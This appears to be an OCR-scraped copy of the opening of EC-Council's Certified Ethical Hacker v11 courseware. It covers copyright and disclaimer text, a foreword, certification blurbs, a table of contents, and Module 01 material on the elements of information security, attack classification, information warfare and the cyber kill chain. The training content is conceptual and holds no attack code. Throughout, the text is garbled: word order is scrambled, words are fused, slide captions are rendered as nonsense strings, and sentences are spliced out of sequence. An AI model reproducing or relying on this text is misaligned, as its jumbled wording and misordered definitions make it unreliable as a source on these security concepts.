Professional Documents
Culture Documents
Ceh11 Book
Ceh11 Book
Ceh11 Book
and
Countermeasures
Version 11
EC-Council
Copyright ©2020byEC-Council. All rghtsreserved.Except undertheCopyright
as permitted Act of 1976,no part
ofthispublication
system,
entered, stored,
maybereproduced
or
andexecutedina computer system,
withtheexception
but maynot be reproduced
in
distributedin anyformor byanymeans, or stored a database
withoutthepriorwritten permission of thepublisher,
for publication
or retrieval
thattheprogramlistings maybe
withoutthe prior
‘writen ofthe publisher,
permission exceptin the case of briefquotations
embodiedin eritcalreviews andcertain
othernoncommercial uses permitted bycopyright law.For permission write to EC-Counell,
requests, addressed
"attention:E¢-Counei,―atthe
address below:
EC-Council
NewMexico
201 SunAve NE
Albuquerque,
NM 87109,
Informationcontainedin thispublication has beenobtainedbyEC-Counel fromsources believedtobereliable,EC:
Counciltakesreasonable measures to ensure that the contentis currentand accurate: however, because of the
possibilty
of human or mechanical error, we do not guarantee the accuracy,adequacy,or completenessof any
informationandare not responsible for anyerrors or omissions nor forthe accuracyofthe resultsobtainedfrom
use ofsuchinformation.
‘The
courseware isa resultof extensive research
a ndcontributionsfrom subject-matter expertsfromall over the
‘world.
Duecreditsforall suchcontributions andreferencesare givenin the courseware in the researchendnotes.
Weare committed to protectingintellectual
propertyrights.
If youate a copyright owner (anexclusivelicenseeor
their
agent)
or
of an agreed
Council
andyou believethatany partof the courseware constitutesa n infringement
licensecontract, youmaynotifyus at legal@eccounci.or.
willemove thematerialin question
of copyright,
In theevent ofa justified
andmake necessary eectifications,
ora breach
complaint,EC:
‘The
courseware maycontainreferences to
shouldnot beconsidered
are encouraged
Readers
as an endorsement other
informationresources andsecurity
af ar recommendation byEC-Councl
solutions,
but suchreferences
at legal@eccounciLorg.
andinaccuracles to EC-Council
to reporterrors,o missions, if you
please
haveanyissues, contact us at support@eccounciLor,
NOTICETO THEREADER
or
E-Couneldoesnot warrant guaranteeanyof the products,
analysis
doesit performany independent in connection
methodologies,
or frameworks
with anyofthe product
described
informationcontained
hereinnor
herein,EC:
Council
assume,
expressly
provided
‘might
anyto
doesnot
obtain
include
ll other
and
toi bythemanufacturer.
beindicated
disclaims,obligation
Thereaderis expressly
bytheactivitiesdescribed
and
warnedto consider
hereinandto avoidal potential
information
andadopt safety
hazards,Byfolowing
thanthat
precautionsthat
theinstruction
containedherein,the readerwillinglyassumes allrisksin connection with suchinstructions. EC-Councilmakesno
representations
warranties
any
kind,
including
but
nat warranties
or
or merchantablity, of
fitness
particular
of
nor are anysuchrepresentations
Counciltakesn o responsiblity
limitedto the
implied
for
with respectto thematerialsetforth herein,
with respectto suchmaterial.EC-Council
purpose
andEC:
shallnot be liablefor any special,
exemplary
damages
consequential,
or
or
upon resulting,
in whole in part,fromthe reader's use of or reliance this
tial andCountermessues
Hacking
©
Copyrightoy E-Cumel
Foreword
Since youare reading
this CEHvL1courseware, you most likelyrealizethe importance
of
information
systems However,
security. compiling
we wouldlike to put forthour motive behind
a
resource
asone
You might
and
whatgaincourse.
such this
asking
find yourself
youcan
whatsetsthiscourse
fromthis
fromthe othersout there.Thetruth is
apart
single address
that no
issues
of being ina
courseware can
the rate at whichexploits,
Moreover,
all the
tools,
informationsecurity detailed
andmethodsare
manner.
discoveredbythe security
makesi t difficultforone programto cover all the necessary
community facetsofinformation
This
doesn’t
security.
that
this
course inany worked
mean is inadequate way as we have
all majordomainsin sucha manner thatthereaderwill be ableto appreciate
hasevolvedover time as well as gain insight
to cover
thewaysecurity
i n to the fundamentalworkings
relevantto each
domain.
and with
It is a blendofacademic
can readily tools
practical supplemented
access in orderto obtaina hands-on
wisdom
experience
thatthereader
emphasis
‘The throughoutthe courseware is on gainingpractical
know-how,
whichexplainsthe
stresson freeandaccessibletools.Youwill readabout some ofthe most widespreadattacks
seen,the populartoolsusedbyattackers, andhowattackshavebeencarriedout usingordinary
resources.
‘You
is a resource
methodology
to
mayalsowant knowwhatto expect
material.Anypenetration
or sequence
once youhavecompleted
firewall,
penetration
in thiscourseware that you can definitelyuse. -
of otherdomains youwill
andof
haveevolvedinto criticalcomponents survival
If involves
hacking creativitythinking ‘out-of-the-box’,
auditswill not ensure the security
adequately protected
proofing
their informationassets,
then
ofan organization. testing
vulnerability andsecurity
To ensure thatorganizations
theymust adoptthe approach
have
of ‘defense in
depth’.
In other words, theymust penetrate their networksandassessthesecurity posturefor
vulnerabilitiesandexposure.
EthicalHackeris an individualwho is usually
‘The employedwith the organization andwho can
same methods
as
a Hacker.Hacking
undera contract between isa
a n Ethical
networks
betrustedto undertakean attemptto penetrate
felony
insome itis by
and/or computer systems
countries. When done request
Hackerandan organization,
usingthe
and
Themost important
itis legal.
pointis that an EthicalHackerhasauthorizationto probe
the target.
‘The
CEHProgram certifies
individuals
officers,
of security
specific
i n the
security
discipline
network Hacking ofEthical
TheCertifiedEthicalHackercertificationwill fortifythe
from a vendor-neutralperspective.
application
knowledge auditors, professionals,
security site administrators,
and anyonewho is concernedabout the integrityof the networkinfrastructure.A Certified
EthicalHackeris a skilled professional who understandsand knowshow to look for the
weaknesses andvulnerabilitiesin targetsystemsand usesthe same knowledge
andtoolsas @
malicioushacker.
To achieve you must passtheCEHexam 312-50,
the CertifiedEthicalHackerCertification,
Pleasevisit https://www.eccouncil.org/programs/certified-ethical-hacker-ceh_
for more
information.
CoursePrerequisites
It is highlyrecommended that candidatespursuing this course have a fundamental
understandingof operatingsystems, computernetworks,
file systems, TCP/IPprotocols,
information controls,
security basicnetworktroubleshooting,
dataleakage,
data backup,
and
riskmanagement.
About EC-Council
‘The
InternationalCouncilof Electronic
Commerce Consultants, betterknownas EC-Council, was
foundedi n late 2001 to addressthe needfor well-educated andcertifiedinformationsecurity
and e-business EC-Council
practitioners. is a global,
member-based organization composed of
industryandsubject matter expertsworking together
to set the standards and raise the bar i n
information securitycertification
andeducation.
EC-Council first developedtheCertifiedEthicalHacker(C|EH)
programwith the goal of teaching
the methodologies, tools,andtechniques usedbyhackers.Leveragingthe collectiveknowledge
of hundredsof subject-matter experts,the CEHprogramhasrapidly gained popularity around
world
aroundthe globe.
a s the benchmark
centers.Itis considered 145 more
950
‘the andis now deliveredi n more than countries by
for manygovernment
than authorized training
entities andmajorcorporations
through
EC-Council,
developed
its impressivenetwork
a rangeof other leading
certifications
ofprofessionals andhugeindustry
programsi n informationsecurity
a re viewedas the essential
following,also
ande-business.
EC-Councilhas
certificationsneededwhenstandardconfiguration
and
security policycourses fall short. Providinga true, hands-on,tacticalapproachto security,
individualsarmedwith the knowledge disseminated byEC-Councilprogramsare tightening
security
networks
world at game,
aroundthe
Programs
Other EC-Council
andbeating hackers their own
Awareness:CertifiedSecureComputer
Security User
| trainingprogramis to provide
Thepurposeof the CSCU studentswith
NetworkDefense:
CertifiedNetworkDefender
| Studentsenrolledin theCertified
NetworkDefender
course will gain @
Certed| na Deter
technologies
so thatstudents
mayunderstand
hownetworks howautomation software
operate,
behaves,
andhowto analyze
networksandtheirdefense.
Students detect,andrespond
willlearnhowto protect, a swellas learning
to thenetworkattacks
aboutnetworkdefensefundamentals, the application
of networksecuritycontrols,
protocols,
perimeter appliances,
secure IDS, VPN,andfirewallconfiguration.
Studentswill alsolearnthe
analysis,
intricacies of networktraffic signature, and vulnerability
scanning,whichwill helpi n
designing
security
policies
successful
incident
improved
response
plans.
These
network
will helporganizationsfosterresiliency
and
andoperational during
continuity attacks.
skills
CertifiedPenetrationTesting
PenetrationTesting: Professional
CPENT certificationrequires you to demonstratethe application
of
! advancedpenetrationtesting techniques such as advanced
CPENT
Pind
irtows secs. tor sytem: atiacs, airanced binaries
exploitation,
exploitswriting, bypassing
a filtered network,
birt
Operational
with pivotinganddoublepivoting, (OT)
Technologypen testing,accessinghiddennetworks
privilege andevading
escalation, defense mechanisms,
EC-Council’s CPENTstandardizes the knowledgebasefor penetration testingprofessionalsby
incorporatingbestpractices followedbyexperienced expertsi n the field. Theobjectiveof the
CPENT i s to ensure thateachprofessional followsa strict codeof ethics, is exposed
to the best
practices i n the domainof penetrationtestingand aware of all the compliance requirements
required
bytheindustry.
Unlikea normalsecurity
professionals
recommend
possess credential
an
certification,
the CPENT
skillsto analyzethe security
corrective measuresauthoritatively.
providesassurancethat security
postureof a network exhaustively
FormanyyearsEC-Council
and
hasbeencertifying
ITSecurity
security
Professionals
thereby
expertise making
around
defensemechanisms.
the globe
to ensure theseprofessionals
EC-Council’s
theseprofessionals
credentials
more sought
are proficient
after byorganizations
i n network
vouchfor their professionalism and
andconsulting
firmsglobally
Forensics:
Computer Computer Forensic
Hacking Investigator
Computer HackingForensicInvestigator
(CHFI)is a comprehensive
course covering major forensicinvestigation
scenarios. It enables
studentsto acquirecrucialhands-onexperiencewith various forensic
investigationtechniques. Studentslearn how to utilize standard
forensictools to successfully carry out a computerforensic
preparing themto betterald i n the prosecution
Investigation, of perpetrators.
CHFI certifiesindividualsi n the specific
EC-Council’s securitydiscipline
of computer
forensics
froma vendor-neutralperspective. TheCHF!certificationbolsterstheapplied
knowledgeoflaw
enforcement personnel, system administrators, officers,
security andmilitary
defense personnel,
legal
professionals,bankers, securityprofessionals,
andanyonewho is concernedaboutthe
of networkinfrastructures.
integrity
IncidentHandling:
EC-Council
CertifiedIncidentHandler
Ee-Coamel
|Certiied
effectively
ineident Mandier
handlepostbreachconsequencesbyreducing of the incident,
the impact fromboth
anda reputational
a financial perspective.
EICIH
i s a method-driven
programthat uses a holisticapproach to cover vast concepts
concerning organizational
incidenthandling and response from preparing and planning the
incidenthandling
responseprocess to recoveringorganizational
assetsaftera security
incident,
Theseconcepts a re essentialfor handlingand responding to securityincidentsto protect
fromfuturethreats attacks.
organizations
or
ertifiedChiefInformationSecurity Officer
TheCertified
ChiefInformation Officer(CCISO)
Security programwas
developedbyEC-Councilto fill a knowledge gap i n the information
securityindustry.Most information certifications
security focuson
specific capabilities.
toolsor practitioner Whenthe CCISO program was
developed,no certification
existedto recognizethe knowledge, skills,
and aptitudesrequired
for an experienced informationsecurity professional
to perform the
dutiesofa CISOeffectively
andcompetently. at thattime, manyquestions
In fact, existedabout
a really
what CISO
TheCCISO
wasvaluetoan
Body
andthe
of Knowledge
thisroleadds
helps
organization,
to define the role of the CISOand clearly outline the
contributionsthis personmakesi n an organization. EC-Councilenhancesthis information
through trainingopportunities conductedas instructor-ledor self-study modulesto ensure
candidateshavea complete understanding of the role.EC-Councilevaluates the knowledge of
CCISO candidateswith a rigorous exam that tests their competence across five domainswith
a
which seasoned securityleader
should
befamiliar.
Application CertifiedApplication
Security: Security
Engineer
TheCertiedApplication Security
Engineer
|. «Gi | (CASE)credential―is developedi n
CASE
[tee se a
CASE
|
rest, 2 08 spzieatinans
software development. expertsglobally
The CASEcredentialtests. the critical
securityski and knowledge required
throughout
atypical development
software (SDLC),
lifecycle focusingon the importanceof the
implementation
of secure methodologies
and practicesi n today’s
insecure operating
environment.
‘The
CASE trainingprogramis developed
certified concurrently professionals
to preparesoftware
with the necessarycapabilitiesthat are expected
byemployers and academiaglobally.tt
is
designed comprehensive
to bea hands-on, application course thatwill help
security software
professionals create secure applications.Thetrainingprogram encompassessecurity activities
involvedin all phases oftheSoftware DevelopmentLifecycle(SDLC):planning,creating,testing,
an
anddeployingapplication.
Unlikeotherapplication security
just
CASEgoesbeyond theguidelines
trainings, on secure coding
practicesand includes secure requirement robustapplication
gathering, design, and handling
security
issues
inpostdevelopment
the most comprehensive
engineers,analysts,
phases
of
certifications
testersglobally,
application
on themarket
andrespected
development.
today.
byhiring
This makes
bysoftware
Itis desired
authorities.
CASE o ne of
application
CertifiedThreat Intelligence
IncidentHandling: Analyst
CertifiedThreatIntelligence is designed
anddeveloped
| in collaboration
Analyst
(C|TIA)
with cybersecurity
andthreatintelligence experts
CT]Atins
tmni[rntuanen
across
treats comprehensive
sutured approse
the globeto helporganizations
risksbyconverting
specilitevel
fr balding
ifs
identify
te teathen
eectve test telignce,
and mitigate
program
business
unknowninternalandexternalthreatsinto known
In theever-changing
threatlandscape, C|TIA ThreatIntelligence
is an essential training
program
for those who deal with cyberthreats on a dailybasis.Organizations todaydemanda
professional-level
cybersecurity threat intelligenceanalystwho can extract theintelligence
from
data byimplementing various advanced strategies. Suchprofessional-level ThreatIntelligence
training
programs
to governmentonly when
can
core
ofcurricula
andindustry mapscomplian
beachieved
published
the the
threat intelligenceframeworks.
with andis
IncidentHandling:
CertifiedSOC
Analyst
SOCAnalyst
TheCertified programis thefirststepto joining a
(CSA)
| center (SOC).
securityoperations It is engineered
aspiringTier | and Tier MlSOCanalysts
for current and
to achieve proficiency
in
performing entry-level
andintermediate-level
operations.
CSAis a trainingand credentialing
programthat helps the candidate
Pleasevisit https://cert.eccouncil.org/certified-ethical-hacker.html
for more information.
Table of Contents
01: toEthical
‘Module Introduction
InformationSecurity
Overview
Hacking
CyberkillChain
Concepts
HackingConcepts
EthicalHacking
Concepts
InformationSecurity
Controls
InformationSecurity
LawsandStandards
Module
02:Concepts andReconnaissance
Footprinting
Footprinting
through
Footprinting SearchEngines
through
Footprinting WebServices
Footprinting
throughSocialNetworking
Sites
WebsiteFootprinting,
EmailFootprinting
Whois
Footprinting
DNSFootprinting
NetworkFootprinting
Footprinting
through
SocialEngineering
Footprinting
Tools
Footprinting
Countermeasures
03:
Scanning
‘Module
NetworkScanning
Networks
Concepts
‘Scanning
Tools
HostDiscovery
PortandServiceDiscovery
(Banner
5 Discovery Grabbing/OS Fingerprinting)
Beyond
‘Scanning IDSandFirewall
Draw NetworkDiagrams
04:
‘Module Enumeration
Concepts
Enumeration
NetBIOSEnumeration
tial andCountermessues
Hacking
©
Copyrightoy E-Cumel
SNMPEnumeration
LDAPEnumeration
NTPandNFSEnumeration
‘SMTP
and DNSEnumeration
OtherEnumerationTechniques
Enumeration
Countermeasures
Module05: Vulnerability
Analysis
Vulnerability
AssessmentConcepts
Vulnerability
Classification
andAssessment Types
Vulnerability
AssessmentS olutionsandTools
Vulnerability
AssessmentReports
06:ConceptsHacking
‘Module System
Hacking
‘System
Gaining
Access
Escalating
Privileges
Maintaining
Clearing
Logs
Access
Module07:MalwareThreats
MalwareConcepts
APTConcepts
TrojanConcepts
VirusandWormConcepts
MalwareConcepts
Fileless
MalwareAnalysis
Countermeasures
Anti-MalwareSoftware
08:
‘ModuleSniffing
Sniffing
Concepts
Sniffing
Technique:
Sniffing
Technique:Attacks
MAC
Attacks
DHCP
Sniffing
Technique:
ARPPoisoning
Sniffing
Technique:
Spoofing Attacks
y E-Gounet
Sniffing
Technique:
Sniffing
Tools
Poisoning
DNS
Countermeasures
Sniffing
Detection Techniques
09:SocialEngineering
‘Module
Engineering
Social
Concepts
Engineering
Social Techniques
InsiderNetworking
Threats
on Social
Impersonation Sites
Identity
Theft
Countermeasures
Module
10:
D0S/DDos
Denial-of-Service
Concepts
AttackTechniques
DoS/DD0S
Botnets
DDoSCaseStudy
DoS/DDoSAttackTools
Countermeasures
D0S/DDoSProtectionTools
Module
Session11: Hijacking
Session
Hijacking
Concepts
Application Hijacking
LevelSession
Hijacking.
NetworkLevelSession
Hijacking
Session Tools
Countermeasures
Module
12:IDS,and
1DS,
IPS,
EvadingFirewalls,Honeypots
Firewall, Concepts
andHoneypot
10S,
IPS,
Honeypot
Firewall,and
Evading
IDS
Solutions
Evading
Firewalls
Evading
1DS/Firewall Tools
Detecting
Honeypots
Web
Module13: Hacking Servers
WebServer Concepts
WebServer Attacks
WebServerAttackMethodology
WebServerAttackTools
Countermeasures
PatchManagement
WebServerSecurityTools
14: Hacking
‘Module WebApplications
WebApplication
Concepts
WebApplication
Threats
WebApplication Methodology
Hacking
andWebShell
WebAPI,Webhooks,
WebApplication
Security
Module15:SQLInjection
SQLInjection
Concepts
TypesofSQLInjection
Methodology
SQLInjection
Tools
SQLInjection
EvasionTechniques
Countermeasures
WirelessNetworks
16:Hacking
‘Module
Wireless
Concepts
WirelessEncryption
Wireless
Threats
WirelessHacking
Methodology
WirelessHacking
Tools
BluetoothHacking
Countermeasures
Wireless
Security
Tools
Module18:loTandOTHacking
loTConcepts
loT Attacks
oT Hacking
Methodology
loT Hacking
Tools
Countermeasures
OTConcepts
OTAttacks
OT Hacking
Methodology
Hacking
OT
Tools
Countermeasures
19:
Module
Cloud
Computing
Cloud
Computing
Concepts.
Container
Technology
Serverless
Computing
CloudComputing
Threats
CloudHacking
CloudSecurity
20: Cryptography
‘Module
Cryptography
Concepts
Encryption
Algorithms
Cryptography
Tools
Infrastructure(PKI)
PublicKey
EmailEncryption
DiskEncryption
Cryptanalysis
Countermeasures
y E-Gounet
Glossary
References
Appendix -
Hacking
A Ethical Essential
Concepts
-1
B
‘Appendix Hacking
-
Ethical Essential
Concepts
-
II
ETHICAL
HACKING
|
Certified Ethical Hacker
Module01:
cote
Tal[0
cel
telah Mn
loler
dale]
Colaealcexe]
Module Objectives
Understanding
the Elements
o f Infrmaton Security
Cverviwof Hacking
Concepts,
Typesa ndPhases
Ethical
Understanding Hacking andts Scope
Concepts
ofinformation
‘overview Secu ActsandLaws
Module Objectives
Attackers
breakinto systems
for various reasons andpurposes. Therefore,it is important to
understandhowmalicioushackersattackandexploit systemsandthe probable reasons behind
thoseattacks. you knowyourself
AsSunTzu states i n theArt of War,“If but not theenemy,for
every victorygained,
you will also suffer a defeat.―System administratorsand security
professionals
must guard their infrastructure byknowing
againstexploits the enemy—the
hacker(s]—who
‘malicious seeksto use the same infrastructurefor illegal
activities.
Thismodulestarts with of the current security
an overview scenario and emerging threat
vectors. It provides the differentelementsof information
insightinto security.Later,the
hacking
modulediscusses and ethical hackingconcepts and endswith a brief discussionon
informationsecurity controls andinformation lawsandacts.
security
AtDescribe
of elements
willbe
able
to:
the end thismodule,
+
of the
you
information security
+
Explaininformationsecurity attacksandinformationwarfare
+
Describecyber kill chainmethodology, TTPs,andloCs
+
Describe hacking concepts, types,andphases
Explainethicalhacking concepts andscope
Understand informationsecurity controls(defense-in-depth, cyber
riskmanagement,
threatintelligence, threatmodeling,incidentmanagement andAl/ML)
process,
Knowaboutthe information securityactsandlaws
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
°e ae @ ae
EthicalHacking Information
Se Information
Security
aK
Information Overview
Security
Information securityrefersto the protection or safeguarding of information and information
systemsthat use, store, and transmit informationfrom unauthorizedaccess,disclosure,
alteration, and destruction. Informationi s a criticalasset that organizationsmust secure. If
sensitive informationfalls into the wrong hands, then the respective may suffer
organization
huge lossesi n terms of finances, brandreputation, customers, or i n otherways.To providean
understanding
of how to secure suchcriticalinformationresources,thismodulestarts with an
overview of informationsecurity.
This section introducesthe elementsof information classification
security, of attacks,
and
informationwarfare.
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
Elementsof InformationSecurity CEH
andinformation
services
Information sa stateofwel-being
secunty offormationan infrastructure
n which
thepossiblity
ofthet, tampering
dupion of and i s ow otlrabe
lntiality
of
deta
Integrity
ot
ewerces
preventing
orTherion ar of nropr wrote
Non-epuaiion
||Seontettneseate
oan cel
ite
eyhn
ee megane
ElementsofInformation Security
Informationsecurity state of the well-being
is “the of informationandinfrastructurei n which
the possibility of theft,tampering, or disruption
of informationand services is kept low or
It relieson five majorelements:confidentiality,
tolerable.― availability,
integrity, authenticity,
andnon-repudiation.
=
Confidentiality
Confidentiality onlyto authorized
is the assurance that the informationis accessible
Confidentiality
Confidentiality
controlsinclude
(such
of equipment
may
breaches occur dueto improperdatahandling hacking
dataclassification,
USBdrives,
as DVDs, andBlu-ray
discs).
dataencryption,
attempt.
and properdisposal or
a
Integrity
Integrity
is the trustworthinessof dataor resources i n the prevention
of improperand
unauthorizedchanges—the assurance that informationis sufficiently
accurate for its
purpose.Measuresto maintain dataintegritymay includea checksum (anumber
produced bya mathematicalfunctionto verify
that a givenblockof datais not changed)
ensures that only
andaccess control(which authorizedpeople can update, add,or delete
data).
Availability
Availability
is the assurance that the systems responsiblefor delivering,
storing,and
processinginformationare accessible when required byauthorizedusers. Measuresto
maintain data availabilitycan includedisk arraysfor redundantsystems andclustered
machines, antivirus softwareto combat malware, and distributed denial-of-service
{0D05) preventionsystems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Authenticity
‘Authenticity
refersto the characteristic documents,
of communication, or anydatathat
ensures the qualityof beinggenuineor uncorrupted.Themajorroleof authenticationis
to confirmthat a user is genuine,Controlssuchas biometrics,
smart cards,anddigital
certificatesensure the authenticity of data, transactions,
communications, and
documents,
Non-Repudiation
Non-repudiationis a way to guarantee that the senderof a message cannot later deny
sent the message
having and that the recipient cannot denyhaving receivedthe
message.Individualsandorganizations use digitalsignaturesto ensure non-repudiation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
j
Motives,Goals,and Objectives
of InformationSecurity
Attacks
C|EH
Attacks
Motive
(Goal)
Method
Vulnerability
= + +
of
|@ Amatweoriginates
out ofthe notion thatthe targets yst stores or processessomething
valuable,
and this
Teast the threat an attack onthe
system
polyinto
(@Auackersry various toolsand atacetechniques wuerabitiesi n a compute
to exploit s ystemoes secu
andcontrols oder ful thal motives
Motives
behind
information
security
attacks
formation| Acievnga
Steling wd nil ta sates ary objectives
resting
fear
andchsos ofthe
tage bydsruptingcrteal Daraying thereputation
Motives,
Goals,
and Objectives
ofInformation Security
Attacks
Attackersgenerally have motives (goals), and objectives behind their informationsecurity
attacks.A motive originates out of the notion that a targetsystemstores or processes
something valuable,whichleadsto the threatof an attackon the system. Thepurposeof the
attackmay be to disrupt the targetorganization's businessoperations, to stealvaluable
informationfor the sakeof curiosity, or even to exact revenge.Therefore, thesemotives or
goals depend on the attacker'sstate of mind,their reason for carryingout suchan activity,as
well as their resources and capabilities. Oncethe attackerdeterminestheir goal,theycan
employ various tools, attacktechniques, andmethodsto exploit vulnerabilitiesi n a computer
system or security policyandcontrols.
Motivesbehindinformationsecurity
=
Attacks Motive (Goal)
attacks
+ Method+ Vulnerability
+
Discupt
business
continuity Propagate
religious
or political
beliefs
+
Performinformationtheft Achievea state'smilitary
objectives
+
Manipulating
data
Createfearandchaosbydisrupting
criticalinfrastructures
thereputation
Damage
Takerevenge
of
the
target
Demandransom
financial
Bring lossto the target
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
Classificationof Attacks CEH
Classificationof Attacks
Accordingto IATF, passive,active,close-in,
attacksare classifiedinto five categories:
security
insider,
anddistribution
Passive Attacks
Passive attacksinvolveintercepting and monitoring networktrafficanddataflow on the
targetnetworkanddo not
tamper with the data,Attackersperform
networkactivities usingsniffers.Theseattacks a re verydifficult
reconnaissance
to detectas theattacker
has no active interaction with the targetsystemor network.Passive attacksallow
on
©
Sniffing
andeavesdropping
Network
traffic analysis
©. Decryption
of weaklyencrypted
traffic
ActiveAttacks
attackstamperwith the datain transit or disrupt
‘Active communication or services
betweenthe systems to bypassor breakinto secured Attackerslaunchattacks
systems.
on the targetsystem
or networkbysending traffic
actively
that can bedetected.These
ical andCountermensores
Mackin ©by E-Comel
Copyright
attacksare performed on the targetnetworkto exploit
the information in transit. They
penetrateor infectthe target'sinternalnetworkandgain access to a remote system to
compromise the internalnetwork.
ofactive
Examples attacks:
(DoS)
attack Profiling
2
>
Denial-of-service
Bypassing mechanisms
protection
andIDS > Firewall attack
Malware (such
attacks as Arbitrary
codeexecution
viruses,worms, ransomware)
Privilege
escalation
Spoofing
of
Modification information
attacks
Backdoor
access
Cryptography
attacks
Replay
attacks attacks
Password-based SQL injection
X88attacks
hijacking
Session
Directory
traversalattacks
Man-in-the-Middleattack
Exploitation
of application
and
DNSandARPpoisoning. OSsoftware
© Compromised-key
attack
Close-inAttacks
Close-inattacksare performed whenthe attackeris i n closephysicalproximitywith the
targetsystem or network.Themain goal of performing
thistypeofattackis to gatheror
modify informationor disruptits access. Forexample, a n attackermightshouldersurf
user credentials. Attackersgain closeproximitythrough surreptitious
entry,open
access,or both,
Examples
of close-inattacks:
© Socialengineering
methods)
(Eavesdropping,
shouldersurfing,
dumpster
diving, andother
InsiderAttacks
bytrustedpersonswhohavephysical
Insiderattacksare performed access to the critical
of
assets the target.An insiderattackinvolvesusingprivileged
intentionally
cause a threat to the organization's
bypass
Insiderscan easily security
accessto violaterules
informationor informationsystems.
rules,corruptvaluableresources,andaccesssensitive
or
information.Theymisuse the organization's
assetsto directlyaffectthe confidentiality,
integrity,and availabilityof informationsystems.These attacksimpact the
organization's
business operations, and profit.Itis difficult to figure
reputation, out an
insider
attack
of insiderattacks:
Examples
and
© Eavesdropping wiretapping
ical andCountermensores
Mackin ©by E-Comel
Copyright
Theftofphysical
devices
Socialengineering
Datatheft andspoliation
> Podslurping
Planting or malware
backdoors,
keyloggers,
Distribution Attacks
Distributionattacksoccur whenattackerstamperwith hardwareor softwareprior to
installation.
Attackerstamperthe hardware or software
at its source or when it is i n
transit. Examplesof distributionattacksincludebackdoorscreatedby softwareor
hardwarevendorsat the time of manufacture.Attackersleverage thesebackdoors to
gainunauthorized accessto the targetinformation, or network.
systems,
© Modificationof softwareor hardwareduring
production
© Modificationof softwareor hardwareduring
distribution
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
InformationWarfare CEH
{©The
t erm information
to gain
warfare infer
competitive advantagesor refers
use
of tothe
over an opponent
information technloges
andcommunication (ICT)
1 defend
agaisttacks on
ICT
asets aqui
ICT
assets
techs the fan opponent
x= E== 2
rapurednst
oo
7
InformationWarfare
Source:http://www.iwar.org.uk
‘The
term informationwarfareor InfoWarrefersto the use of informationandcommunication
technologies
(ICT)for competitiveadvantages
over an of information
opponent.Examples
warfare weapons include viruses, worms, Trojan horses, logicbombs,trap doors,
nanomachines andmicrobes,
electronic
jamming,andpenetration
Martin Libickidividedinformationwarfareinto the following
andtools.
exploits
categories
*
Commandand control warfare (C2warfare): In the computer industry,
security C2
warfarerefersto the impacta n attackerpossessesover a compromisedsystemor
networkthat theycontrol.
Intelligence-based
warfare: Intelligence-based technology
warfare is a sensor-based
that directly
corruptstechnological According
systems. “intelligence-based
to Libicki,
is warfarethat consistsof the design,
warfare― anddenialof systems
protection, that
seek
sufficient
dominate
battlespace.
knowledgeto
Electronicwarfare:According
the
electronicwarfareuses radio-electronicand
to Libicki,
cryptographictechniques to degrade communication. Radioelectronictechniques
means of sending
attackthe physical information, whereascryptographic techniques
use bitsandbytes
to disruptthe means of sendinginformation,
Psychological
warfare:Psychological
warfareis the use of various techniques
suchas
propagandaandterror to demoralize adversary
one’s in an attemptto succeed i n battle.
Hackerwarfare:According to Libicki,
the purpose of this typeof warfare vary from
can
the shutdownof systems, dataerrors, theftof information, theft of services, system
ical andCountermensores
Mackin ©by E-Comel
Copyright
and access to data. Hackersgenerally
falsemessaging,
monitoring, use viruses, logic
bombs,Trojan
horses,
andsniffersto perform
theseattacks
Economic warfare: Libickinotes that economic informationwarfare can affect the
economyof a businessor nation byblocking the flow of information.Thiscouldbe
especially
devastatingto organizationsthat do a lot of businessi n the digital
world
Cyberwarfare:definescyber
Libicki warfareas the use of information
systems
against
the virtual personas of individualsor groups. It is the broadestof all information
warfare. It includes information
terrorism,semanticattacks (similar
to Hacker warfare,
but insteadof harming a system,it takes over the systemwhile maintaining the
perception that it is operatingcorrectly),
and simula-warfare(simulated war, for
example, acquiringweaponsfor mere demonstration ratherthanactualuse),
Eachform of informationwarfarementionedaboveconsistsof both defensiveandoffensive
strategies.
Defensive Information
Warfare: and actions to defendagainst
Involvesall strategies
attackson ICTassets.
Offensive InformationWarfare:Involvesattacksagainst
a
the
ICT
assets
otensiecwartare
of an opponent.
Jy co Nee
——
‘Web
ever
we
@ can or
Emergency
Preparedness
Response
Ma acts
Sytemarg
ofinformation
1.2:BlockDiagram
Figure Warfare
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
ModuleFlow CEH
©Brermen
sooner
©rcxing concent
EthicalHacking InformationSecurity
Concepts awe and Standards
ical andCountermensores
Mackin ©by E-Comel
Copyright
CyberKill Chain Methodology CEH
Kill
Cyber ChainMethodology
The cyberkill chain methodology is a component of intelligence-drivendefensefor the
identification and prevention ofmalicious intrusion activities. Thismethodologyhelps security
professionals in identifying
the stepsthatadversaries followin orderto accomplish their goals.
Thecyber kill chainis a frameworkdeveloped for securingcyberspace basedon the concept of,
military
killchains, Thismethodaims to actively enhanceintrusion detectionandresponse. The
cyberkill chainis equipped with a seven-phase protection mechanism to mitigateand reduce
cyber
threats.
‘Accordingto LockheedMartin,cyberattacks mightoccur in seven different phases, from
reconnaissance to the final accomplishment of the objective.
An understanding of cyberkill
chainmethodology helps professionals
security to leverage controls
security at different
stages
of a n attackand helps them to prevent It also provides
the attackbefore it succeeds. greater
insight into theattackphases, whichhelps theadversary’s
i n understanding
TTPs
beforehand.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Discussed
beloware various phases
includedin cyber
kill chainmethodology:
Reconnaissance
adversary
‘An performs reconnaissanceto collectas muchinformationaboutthe target
as possible to probe for weak pointsbeforeactually attacking.
They lookfor information
suchas publicly availableinformation o n the Internet,
network information, system
information, and the organizational information of the target.By conducting
reconnaissanceacrossdifferent networklevels, can gaininformation
the adversary such
as network blocks, specific IP addresses,and employeedetails.Theadversary may use
automatedtools suchas open portsandservices, vulnerabilities i n applications,
and
logincredentials, to obtain information.Suchinformationcan helpthe adversary in
Bainingbackdoor
access to the targetnetwork.
Activitiesof the adversary includethe following:
© Gathering bysearching
informationaboutthe targetorganization the Internetor
through
social
engineering
Performing ofvarious onlineactivities andpublicly
analysis availableinformation
Gathering
informationfromsocialnetworking sitesandweb services
Obtaining
informationaboutwebsitesvisited
andanalyzing
Monitoring organization's
the target website
Performing
Whois,DNS, andnetworkfootprinting
Performing to identify
scanning openportsandservices
Weaponization
The adversary the data collectedi n the previous stageto identify
analyzes the
vulnerabilities
